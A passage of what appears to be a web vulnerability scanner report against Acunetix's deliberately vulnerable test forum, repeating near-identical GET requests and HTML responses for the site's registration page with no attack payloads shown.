to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> 